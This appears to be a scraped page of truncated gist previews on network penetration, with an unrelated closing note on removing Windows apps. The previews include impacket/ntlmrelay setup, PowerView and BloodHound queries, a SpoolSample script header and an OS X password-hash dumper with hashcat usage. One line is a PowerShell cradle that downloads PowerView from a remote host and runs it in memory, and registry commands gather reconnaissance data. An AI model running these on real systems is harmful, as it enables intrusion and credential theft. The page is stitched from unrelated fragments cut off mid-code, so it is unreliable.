This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.
Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
| #!/usr/bin/python3 | |
| ''' | |
| author: ceres-c | |
| usage: ./frida-extract-keystore.py | |
| Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool | |
| ''' | |
| import frida, sys, time |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| --------------- | |
| MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer | |
| RETURN u.name | |
| That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership | |
| --------------- | |
| MATCH | |
| (U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer) |
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser | |
| from time import sleep |
| #!/bin/bash | |
| sudo apt-get install git | |
| cd /tmp/ | |
| git clone https://github.com/darkoperator/MSF-Installer.git | |
| cd MSF-Installer | |
| sudo ./msf_install.sh -i | |
| source ~/.bashrc | |
| sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log |
| #!/usr/bin/python | |
| # extracts OSX user hashes and outputs a format crackable with oclHashcat | |
| # adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored | |
| # and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/ | |
| # | |
| # automation of approach by @harmj0y | |
| # | |
| # sudo ./osx_hashdump.py | |
| # ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt |
| # Import PowerView into memory without touching disk | |
| # IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
| ################################### | |
| # Hunting for Users | |
| ################################### | |
| # search for administrator groups |
| Windows version: | |
| reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
| Users who have authed to the system: | |
| ls C:\Users\ | |
| System env variables: | |
| reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
| Saved outbound RDP connections: |
Open PowerShell (right click > run as Administrator), and enter
Get-AppxPackage *photo* | Remove-AppxPackage
For other apps just replace "photo" with something else.
If you want to look at the list of installed applications just use Get-AppxPackage,
if you want to copy said list into a program better suited for working with text (eg. has search), just type Get-AppxPackage | clip